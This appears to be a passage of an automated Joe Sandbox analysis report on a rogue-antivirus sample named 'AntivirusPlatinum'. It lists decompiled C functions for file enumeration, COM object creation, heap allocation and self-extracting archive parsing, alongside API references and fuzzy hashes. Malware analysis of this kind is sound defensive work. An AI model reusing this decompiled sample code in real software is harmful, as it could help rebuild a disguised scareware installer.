                                                                                                                                                  0x00405c8b

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,00000000,?,01000000,?,?,00000000), ref: 00405C75
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405C82
                                                                                                                                                  • FindNextFileW.KERNEL32(?,?,00000000,?,01000000,?,?,00000000), ref: 00405CA5
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405CB2
                                                                                                                                                    • Part of subcall function 0040E115: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,00405198,?,?,01000000,?), ref: 0040E12F
                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405E30
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405E3D
                                                                                                                                                  • FindNextFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405E62
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405E6F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileFindLast$FirstNext$ByteCharMultiVersionWide
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 3067395930-3595611156
                                                                                                                                                  • Opcode ID: 1a45d5538c5dfd2a89186e743a16fdedd99f6725e566e313df3d702d666fbaf3
                                                                                                                                                  • Instruction ID: e8a49d90b98f97b96c040a5bbc5ad6dfd2bbe94d724088299ed6a28abedc6e2c
                                                                                                                                                  • Opcode Fuzzy Hash: 1a45d5538c5dfd2a89186e743a16fdedd99f6725e566e313df3d702d666fbaf3
                                                                                                                                                  • Instruction Fuzzy Hash: 0EA109B19006489BDB20EF75CC81BDB77F8EF04304F10496BE59AE2291DB78AA85CF54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                  			E0040A9BD(intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				short _v532;
                                                                                                                                                  				char _v1556;
                                                                                                                                                  				char* _t34;
                                                                                                                                                  				intOrPtr* _t36;
                                                                                                                                                  				intOrPtr* _t38;
                                                                                                                                                  				intOrPtr* _t44;
                                                                                                                                                  				intOrPtr* _t46;
                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                  				intOrPtr* _t52;
                                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                  				intOrPtr* _t58;
                                                                                                                                                  				int _t60;
                                                                                                                                                  
                                                                                                                                                  				_t60 = 0;
                                                                                                                                                  				__imp__OleInitialize(0);
                                                                                                                                                  				_t34 =  &_v8;
                                                                                                                                                  				__imp__CoCreateInstance(0x4128cc, 0, 1, 0x41281c, _t34); // executed
                                                                                                                                                  				if(_t34 >= 0) {
                                                                                                                                                  					_t36 = _v8;
                                                                                                                                                  					 *((intOrPtr*)( *_t36 + 0x50))(_t36, _a4);
                                                                                                                                                  					_t38 = _v8;
                                                                                                                                                  					 *((intOrPtr*)( *_t38 + 0x1c))(_t38, _a12);
                                                                                                                                                  					if(_a16 != 0) {
                                                                                                                                                  						_t58 = _v8;
                                                                                                                                                  						 *((intOrPtr*)( *_t58 + 0x44))(_t58, _a16, 0);
                                                                                                                                                  					}
                                                                                                                                                  					if(_a20 != _t60) {
                                                                                                                                                  						_t56 = _v8;
                                                                                                                                                  						 *((intOrPtr*)( *_t56 + 0x2c))(_t56, _a20);
                                                                                                                                                  					}
                                                                                                                                                  					E0040A477( &_v1556, _a4);
                                                                                                                                                  					E00407720( &_v1556);
                                                                                                                                                  					if(_v1556 != _t60) {
                                                                                                                                                  						_t54 = _v8;
                                                                                                                                                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54,  &_v1556);
                                                                                                                                                  					}
                                                                                                                                                  					_t44 = _v8;
                                                                                                                                                  					_push( &_v12);
                                                                                                                                                  					_push(0x4128bc);
                                                                                                                                                  					_push(_t44);
                                                                                                                                                  					if( *((intOrPtr*)( *_t44))() >= 0) {
                                                                                                                                                  						MultiByteToWideChar(_t60, _t60, _a8, 0xffffffff,  &_v532, 0x104);
                                                                                                                                                  						_t50 = _v12;
                                                                                                                                                  						_push(1);
                                                                                                                                                  						_push( &_v532);
                                                                                                                                                  						_push(_t50); // executed
                                                                                                                                                  						if( *((intOrPtr*)( *_t50 + 0x18))() >= 0) {
                                                                                                                                                  							_t60 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						_t52 = _v12;
                                                                                                                                                  						 *((intOrPtr*)( *_t52 + 8))(_t52);
                                                                                                                                                  					}
                                                                                                                                                  					_t46 = _v8;
                                                                                                                                                  					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                  				}
                                                                                                                                                  				__imp__OleUninitialize();
                                                                                                                                                  				return _t60;
                                                                                                                                                  			}


















                                                                                                                                                  0x0040a9c7
                                                                                                                                                  0x0040a9ca
                                                                                                                                                  0x0040a9d0
                                                                                                                                                  0x0040a9e1
                                                                                                                                                  0x0040a9e9
                                                                                                                                                  0x0040a9ef
                                                                                                                                                  0x0040a9f8
                                                                                                                                                  0x0040a9fb
                                                                                                                                                  0x0040aa04
                                                                                                                                                  0x0040aa0a
                                                                                                                                                  0x0040aa0c
                                                                                                                                                  0x0040aa16
                                                                                                                                                  0x0040aa16
                                                                                                                                                  0x0040aa1c
                                                                                                                                                  0x0040aa1e
                                                                                                                                                  0x0040aa27
                                                                                                                                                  0x0040aa27
                                                                                                                                                  0x0040aa34
                                                                                                                                                  0x0040aa40
                                                                                                                                                  0x0040aa4b
                                                                                                                                                  0x0040aa4d
                                                                                                                                                  0x0040aa5a
                                                                                                                                                  0x0040aa5a
                                                                                                                                                  0x0040aa5d
                                                                                                                                                  0x0040aa65
                                                                                                                                                  0x0040aa66
                                                                                                                                                  0x0040aa6b
                                                                                                                                                  0x0040aa70
                                                                                                                                                  0x0040aa85
                                                                                                                                                  0x0040aa8b
                                                                                                                                                  0x0040aa90
                                                                                                                                                  0x0040aa98
                                                                                                                                                  0x0040aa99
                                                                                                                                                  0x0040aa9f
                                                                                                                                                  0x0040aaa1
                                                                                                                                                  0x0040aaa1
                                                                                                                                                  0x0040aaa3
                                                                                                                                                  0x0040aaa9
                                                                                                                                                  0x0040aaa9
                                                                                                                                                  0x0040aaac
                                                                                                                                                  0x0040aab2
                                                                                                                                                  0x0040aab2
                                                                                                                                                  0x0040aab5
                                                                                                                                                  0x0040aabf

                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040A9CA
                                                                                                                                                  • CoCreateInstance.OLE32(004128CC,00000000,00000001,0041281C,?), ref: 0040A9E1
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040AA85
                                                                                                                                                  • OleUninitialize.OLE32 ref: 0040AAB5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2968213145-0
                                                                                                                                                  • Opcode ID: 5959a21a4365000ac8d7732775093f3948591aca15d2945793f0ef5b4e0237ea
                                                                                                                                                  • Instruction ID: 6b7c248a20d7c3edf2c5fae1c052d584914ffab3addb81b43edd9a7ac8a902f0
                                                                                                                                                  • Opcode Fuzzy Hash: 5959a21a4365000ac8d7732775093f3948591aca15d2945793f0ef5b4e0237ea
                                                                                                                                                  • Instruction Fuzzy Hash: 9C31C775A00209AFDF00DFA0C988E9A7B79AF48304F1444A9F515EB291C775DE61DF64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040A1EC(long _a4) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  
                                                                                                                                                  				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}




                                                                                                                                                  0x0040a1fb
                                                                                                                                                  0x0040a202

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040A673,?,?,00402BD9), ref: 0040A1F4
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0040A673,?,?,00402BD9), ref: 0040A1FB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                                  • Opcode ID: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                  • Instruction ID: 7a16409088186048d9048875d39c01f0395119e9692a071e2e70866dbb263e04
                                                                                                                                                  • Opcode Fuzzy Hash: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                  • Instruction Fuzzy Hash: 35C04C76044208A7C6105BD1AD09B857E1EE718651F008121F70585050C6B15120D66E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                  			E00401357(void* __ecx, void* __edx, char _a4) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				char _v36;
                                                                                                                                                  				void* _t87;
                                                                                                                                                  				signed int _t88;
                                                                                                                                                  				void* _t90;
                                                                                                                                                  				signed int _t93;
                                                                                                                                                  				signed int _t108;
                                                                                                                                                  				signed char _t115;
                                                                                                                                                  				signed int _t119;
                                                                                                                                                  				intOrPtr _t120;
                                                                                                                                                  				char _t129;
                                                                                                                                                  				signed int _t132;
                                                                                                                                                  				char* _t143;
                                                                                                                                                  				signed int _t144;
                                                                                                                                                  				char* _t151;
                                                                                                                                                  				void* _t156;
                                                                                                                                                  				intOrPtr _t157;
                                                                                                                                                  				signed int _t166;
                                                                                                                                                  				char _t167;
                                                                                                                                                  				signed int _t180;
                                                                                                                                                  				intOrPtr _t181;
                                                                                                                                                  				void* _t182;
                                                                                                                                                  
                                                                                                                                                  				_t178 = __edx;
                                                                                                                                                  				_t182 = __ecx;
                                                                                                                                                  				_t179 = __ecx + 0x4630;
                                                                                                                                                  				 *((char*)(__ecx + 0x6d90)) = 0;
                                                                                                                                                  				_t87 = E0040568A(__ecx, __edx, __ecx + 0x4630, 7); // executed
                                                                                                                                                  				if(_t87 != 7) {
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t160 = _t182;
                                                                                                                                                  				 *(_t182 + 0x6d94) = 0;
                                                                                                                                                  				_t88 = E0040122B(_t182, _t179);
                                                                                                                                                  				__eflags = _t88;
                                                                                                                                                  				if(_t88 == 0) {
                                                                                                                                                  					E00403952( &_v24, 0x80000);
                                                                                                                                                  					_t90 = E00404FDC(_t182, _t178); // executed
                                                                                                                                                  					_t156 = _t90;
                                                                                                                                                  					_t93 = E0040568A(_t182, _t178, _v24, _v20 + 0xfffffff0); // executed
                                                                                                                                                  					_t180 = 0;
                                                                                                                                                  					_v8 = _t93;
                                                                                                                                                  					__eflags = _t93;
                                                                                                                                                  					if(_t93 <= 0) {
                                                                                                                                                  						L20:
                                                                                                                                                  						__eflags =  *(_t182 + 0x6d94);
                                                                                                                                                  						if( *(_t182 + 0x6d94) != 0) {
                                                                                                                                                  							__eflags = _v24;
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								E0040A205(_v24); // executed
                                                                                                                                                  							}
                                                                                                                                                  							goto L25;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _v24;
                                                                                                                                                  						if(_v24 != 0) {
                                                                                                                                                  							E0040A205(_v24);
                                                                                                                                                  						}
                                                                                                                                                  						goto L29;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L6;
                                                                                                                                                  					}
                                                                                                                                                  					do {
                                                                                                                                                  						L6:
                                                                                                                                                  						_t143 = _v24 + _t180;
                                                                                                                                                  						__eflags =  *_t143 - 0x52;
                                                                                                                                                  						if( *_t143 != 0x52) {
                                                                                                                                                  							goto L16;
                                                                                                                                                  						}
                                                                                                                                                  						_t176 = _t182;
                                                                                                                                                  						_t144 = E0040122B(_t182, _t143);
                                                                                                                                                  						__eflags = _t144;
                                                                                                                                                  						if(_t144 == 0) {
                                                                                                                                                  							goto L16;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *(_t182 + 0x6d88);
                                                                                                                                                  						if( *(_t182 + 0x6d88) == 0) {
                                                                                                                                                  							L18:
                                                                                                                                                  							 *(_t182 + 0x6d94) = _t180 + _t156;
                                                                                                                                                  							E004054ED(_t176, _t180 + _t156, 0, 0);
                                                                                                                                                  							__eflags =  *(_t182 + 0x6d88);
                                                                                                                                                  							if( *(_t182 + 0x6d88) == 0) {
                                                                                                                                                  								E0040568A(_t182, _t178, _t182 + 0x4630, 7);
                                                                                                                                                  							}
                                                                                                                                                  							goto L20;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _t180;
                                                                                                                                                  						if(_t180 <= 0) {
                                                                                                                                                  							goto L18;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _t156 - 0x1c;
                                                                                                                                                  						if(_t156 >= 0x1c) {
                                                                                                                                                  							goto L18;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _v8 - 0x1f;
                                                                                                                                                  						if(_v8 <= 0x1f) {
                                                                                                                                                  							goto L18;
                                                                                                                                                  						}
                                                                                                                                                  						_t151 = _v24 - _t156 + 0x1c;
                                                                                                                                                  						__eflags =  *_t151 - 0x52;
                                                                                                                                                  						if( *_t151 != 0x52) {
                                                                                                                                                  							goto L16;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *((char*)(_t151 + 1)) - 0x53;
                                                                                                                                                  						if( *((char*)(_t151 + 1)) != 0x53) {
                                                                                                                                                  							goto L16;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *((char*)(_t151 + 2)) - 0x46;
                                                                                                                                                  						if( *((char*)(_t151 + 2)) != 0x46) {
                                                                                                                                                  							goto L16;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *((char*)(_t151 + 3)) - 0x58;
                                                                                                                                                  						if( *((char*)(_t151 + 3)) == 0x58) {
                                                                                                                                                  							goto L18;
                                                                                                                                                  						}
                                                                                                                                                  						L16:
                                                                                                                                                  						_t180 = _t180 + 1;
                                                                                                                                                  						__eflags = _t180 - _v8;
                                                                                                                                                  					} while (_t180 < _v8);
                                                                                                                                                  					goto L20;
                                                                                                                                                  				} else {
                                                                                                                                                  					__eflags =  *(_t182 + 0x6d88);
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						E004054ED(_t160, 0, 0, 0);
                                                                                                                                                  					}
                                                                                                                                                  					L25:
                                                                                                                                                  					E00401CE5(_t182, _t178, __eflags); // executed
                                                                                                                                                  					E00401264(_t182);
                                                                                                                                                  					__eflags =  *((intOrPtr*)(_t182 + 0x6d9a)) -  *((intOrPtr*)(_t182 + 0x468c));
                                                                                                                                                  					if( *((intOrPtr*)(_t182 + 0x6d9a)) ==  *((intOrPtr*)(_t182 + 0x468c))) {
                                                                                                                                                  						L27:
                                                                                                                                                  						_t166 =  *(_t182 + 0x4694) & 0x0000ffff;
                                                                                                                                                  						 *(_t182 + 0x6d8a) =  *(_t182 + 0x4694) & 0x00000001;
                                                                                                                                                  						 *(_t182 + 0x6d89) = _t166 >> 0x00000003 & 0x00000001;
                                                                                                                                                  						 *(_t182 + 0x6d8b) = _t166 >> 0x00000001 & 0x00000001;
                                                                                                                                                  						_t108 = _t166 >> 0x00000002 & 0x00000001;
                                                                                                                                                  						__eflags =  *(_t182 + 0x469c);
                                                                                                                                                  						 *(_t182 + 0x6d8c) = _t108;
                                                                                                                                                  						 *((char*)(_t182 + 0x6d8d)) = _t108 & 0xffffff00 |  *(_t182 + 0x469c) != 0x00000000;
                                                                                                                                                  						 *(_t182 + 0x6d8f) = _t166 >> 0x00000006 & 0x00000001;
                                                                                                                                                  						_t115 = _t166 >> 0x00000007 & 0x00000001;
                                                                                                                                                  						__eflags =  *((char*)(_t182 + 0x46a0)) - 0x24;
                                                                                                                                                  						 *(_t182 + 0x6d90) = _t115;
                                                                                                                                                  						if( *((char*)(_t182 + 0x46a0)) <= 0x24) {
                                                                                                                                                  							__eflags = _t115;
                                                                                                                                                  							if(_t115 == 0) {
                                                                                                                                                  								L33:
                                                                                                                                                  								_t167 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								L34:
                                                                                                                                                  								__eflags =  *((char*)(_t182 + 0x467c));
                                                                                                                                                  								 *((char*)(_t182 + 0x6d8e)) = _t167;
                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                  									L36:
                                                                                                                                                  									E0040A7E9( &_v36, _t178, _t182);
                                                                                                                                                  									_t181 =  *((intOrPtr*)(_t182 + 0x6d78));
                                                                                                                                                  									_t157 =  *((intOrPtr*)(_t182 + 0x6d7c));
                                                                                                                                                  									_v12 =  *((intOrPtr*)(_t182 + 0x6d80));
                                                                                                                                                  									_v8 =  *(_t182 + 0x6d84);
                                                                                                                                                  									 *((char*)(_t182 + 0x6d8e)) = 0;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t119 = E00401CE5(_t182, _t178, __eflags); // executed
                                                                                                                                                  										__eflags = _t119;
                                                                                                                                                  										if(_t119 == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										_t120 =  *((intOrPtr*)(_t182 + 0x4678));
                                                                                                                                                  										__eflags = _t120 - 0x7a;
                                                                                                                                                  										if(_t120 != 0x7a) {
                                                                                                                                                  											__eflags = _t120 - 0x74;
                                                                                                                                                  											if(_t120 != 0x74) {
                                                                                                                                                  												L53:
                                                                                                                                                  												 *((intOrPtr*)(_t182 + 0x6d80)) = _v12;
                                                                                                                                                  												 *((intOrPtr*)(_t182 + 0x6d78)) = _t181;
                                                                                                                                                  												 *((intOrPtr*)(_t182 + 0x6d7c)) = _t157;
                                                                                                                                                  												 *(_t182 + 0x6d84) = _v8;
                                                                                                                                                  												E0040A810( &_v36);
                                                                                                                                                  												L54:
                                                                                                                                                  												__eflags =  *(_t182 + 0x6d8a);
                                                                                                                                                  												if( *(_t182 + 0x6d8a) == 0) {
                                                                                                                                                  													L56:
                                                                                                                                                  													E0040A477(_t182 + 0x6db5, _t182 + 0x17);
                                                                                                                                                  													__eflags = _t182 + 0x71b6;
                                                                                                                                                  													E0040E338(_t182 + 0x71b6, _t182 + 0x418);
                                                                                                                                                  													L57:
                                                                                                                                                  													_t129 = 1;
                                                                                                                                                  													L58:
                                                                                                                                                  													return _t129;
                                                                                                                                                  												}
                                                                                                                                                  												__eflags =  *((char*)(_t182 + 0x6d8e));
                                                                                                                                                  												if( *((char*)(_t182 + 0x6d8e)) != 0) {
                                                                                                                                                  													goto L57;
                                                                                                                                                  												}
                                                                                                                                                  												goto L56;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags =  *(_t182 + 0x46b0) & 0x00000001;
                                                                                                                                                  											if(( *(_t182 + 0x46b0) & 0x00000001) != 0) {
                                                                                                                                                  												L52:
                                                                                                                                                  												 *((char*)(_t182 + 0x6d8e)) = 1;
                                                                                                                                                  												goto L53;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags =  *(_t182 + 0x6d8a);
                                                                                                                                                  											if( *(_t182 + 0x6d8a) == 0) {
                                                                                                                                                  												goto L53;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags =  *((char*)(_t182 + 0x46c8)) - 0x1d;
                                                                                                                                                  											if( *((char*)(_t182 + 0x46c8)) < 0x1d) {
                                                                                                                                                  												goto L53;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags =  *(_t182 + 0x4694) & 0x00000100;
                                                                                                                                                  											if(( *(_t182 + 0x4694) & 0x00000100) != 0) {
                                                                                                                                                  												goto L53;
                                                                                                                                                  											}
                                                                                                                                                  											goto L52;
                                                                                                                                                  										}
                                                                                                                                                  										_t132 = E0040A4E9(_t182 + 0x53e8, "CMT");
                                                                                                                                                  										__eflags = _t132;
                                                                                                                                                  										if(_t132 == 0) {
                                                                                                                                                  											 *(_t182 + 0x6d8b) = 1;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *(_t182 + 0x53c0) & 0x00000001;
                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                  											L43:
                                                                                                                                                  											 *((char*)(_t182 + 0x6d8e)) = 1;
                                                                                                                                                  											goto L44;
                                                                                                                                                  										} else {
                                                                                                                                                  											__eflags =  *(_t182 + 0x6d8a);
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												L44:
                                                                                                                                                  												E00401264(_t182);
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags =  *(_t182 + 0x4694) & 0x00000100;
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												goto L44;
                                                                                                                                                  											}
                                                                                                                                                  											goto L43;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L53;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t115;
                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                  									goto L54;
                                                                                                                                                  								}
                                                                                                                                                  								goto L36;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t166 & 0x00000100;
                                                                                                                                                  							if((_t166 & 0x00000100) != 0) {
                                                                                                                                                  								goto L33;
                                                                                                                                                  							}
                                                                                                                                                  							_t167 = 1;
                                                                                                                                                  							goto L34;
                                                                                                                                                  						}
                                                                                                                                                  						E0040325C(0x414c7c, 1);
                                                                                                                                                  						L29:
                                                                                                                                                  						_t129 = 0;
                                                                                                                                                  						goto L58;
                                                                                                                                                  					}
                                                                                                                                                  					_push(E004098F7(0x7c));
                                                                                                                                                  					_push(_t182 + 0x17);
                                                                                                                                                  					E00402C95(E0040B2A9());
                                                                                                                                                  					__eflags = _a4;
                                                                                                                                                  					if(_a4 == 0) {
                                                                                                                                                  						goto L29;
                                                                                                                                                  					}
                                                                                                                                                  					goto L27;
                                                                                                                                                  				}
                                                                                                                                                  			}




























                                                                                                                                                  0x00401357
                                                                                                                                                  0x0040135f
                                                                                                                                                  0x00401363
                                                                                                                                                  0x0040136a
                                                                                                                                                  0x00401371
                                                                                                                                                  0x00401379
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040137b
                                                                                                                                                  0x00401386
                                                                                                                                                  0x00401388
                                                                                                                                                  0x0040138e
                                                                                                                                                  0x00401393
                                                                                                                                                  0x00401395
                                                                                                                                                  0x004013b8
                                                                                                                                                  0x004013bf
                                                                                                                                                  0x004013c4
                                                                                                                                                  0x004013d2
                                                                                                                                                  0x004013d7
                                                                                                                                                  0x004013d9
                                                                                                                                                  0x004013dc
                                                                                                                                                  0x004013de
                                                                                                                                                  0x00401465
                                                                                                                                                  0x00401467
                                                                                                                                                  0x0040146d
                                                                                                                                                  0x00401485
                                                                                                                                                  0x00401488
                                                                                                                                                  0x0040148d
                                                                                                                                                  0x0040148d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401488
                                                                                                                                                  0x0040146f
                                                                                                                                                  0x00401472
                                                                                                                                                  0x0040147b
                                                                                                                                                  0x0040147b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004013e4
                                                                                                                                                  0x004013e4
                                                                                                                                                  0x004013e7
                                                                                                                                                  0x004013e9
                                                                                                                                                  0x004013ec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004013ef
                                                                                                                                                  0x004013f1
                                                                                                                                                  0x004013f6
                                                                                                                                                  0x004013f8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004013fa
                                                                                                                                                  0x00401401
                                                                                                                                                  0x00401439
                                                                                                                                                  0x00401441
                                                                                                                                                  0x00401447
                                                                                                                                                  0x0040144c
                                                                                                                                                  0x00401453
                                                                                                                                                  0x00401460
                                                                                                                                                  0x00401460
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401453
                                                                                                                                                  0x00401403
                                                                                                                                                  0x00401405
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401407
                                                                                                                                                  0x0040140a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040140c
                                                                                                                                                  0x00401410
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401417
                                                                                                                                                  0x0040141a
                                                                                                                                                  0x0040141d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040141f
                                                                                                                                                  0x00401423
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401425
                                                                                                                                                  0x00401429
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040142b
                                                                                                                                                  0x0040142f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401431
                                                                                                                                                  0x00401431
                                                                                                                                                  0x00401432
                                                                                                                                                  0x00401432
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401397
                                                                                                                                                  0x00401397
                                                                                                                                                  0x0040139d
                                                                                                                                                  0x004013a6
                                                                                                                                                  0x004013a6
                                                                                                                                                  0x00401492
                                                                                                                                                  0x00401494
                                                                                                                                                  0x0040149b
                                                                                                                                                  0x004014a7
                                                                                                                                                  0x004014ae
                                                                                                                                                  0x004014ce
                                                                                                                                                  0x004014ce
                                                                                                                                                  0x004014dd
                                                                                                                                                  0x004014ea
                                                                                                                                                  0x004014f6
                                                                                                                                                  0x00401501
                                                                                                                                                  0x00401503
                                                                                                                                                  0x0040150a
                                                                                                                                                  0x00401513
                                                                                                                                                  0x00401520
                                                                                                                                                  0x0040152b
                                                                                                                                                  0x0040152d
                                                                                                                                                  0x00401534
                                                                                                                                                  0x0040153a
                                                                                                                                                  0x0040154f
                                                                                                                                                  0x00401551
                                                                                                                                                  0x00401560
                                                                                                                                                  0x00401560
                                                                                                                                                  0x00401560
                                                                                                                                                  0x00401562
                                                                                                                                                  0x00401562
                                                                                                                                                  0x00401569
                                                                                                                                                  0x0040156f
                                                                                                                                                  0x00401579
                                                                                                                                                  0x0040157d
                                                                                                                                                  0x00401588
                                                                                                                                                  0x0040158e
                                                                                                                                                  0x00401594
                                                                                                                                                  0x0040159d
                                                                                                                                                  0x004015a0
